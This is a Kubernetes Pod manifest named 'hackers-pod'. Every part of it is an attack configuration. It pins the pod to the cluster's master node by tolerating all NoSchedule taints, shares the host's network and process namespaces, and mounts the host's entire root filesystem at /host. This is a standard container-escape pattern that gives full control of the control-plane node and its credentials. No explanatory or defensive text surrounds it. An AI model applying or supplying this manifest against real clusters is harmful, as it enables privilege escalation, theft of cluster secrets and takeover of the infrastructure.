---
apiVersion: v1
kind: Pod
metadata:
  name: hackers-pod
spec:
  containers:
  - command: ["/bin/bash", "-c", "sleep 100000"]
    image: centosadmin/kubernetes-helm:v2.14.0
    name: hackers-pod
    volumeMounts:
    - mountPath: /host
      name: host
  hostNetwork: true
  hostPID: true
  tolerations:
  - effect: NoSchedule
    operator: Exists
  nodeSelector:
    node-role.kubernetes.io/master: ""
  volumes:
  - hostPath:
      path: /
      type: Directory
    name: host
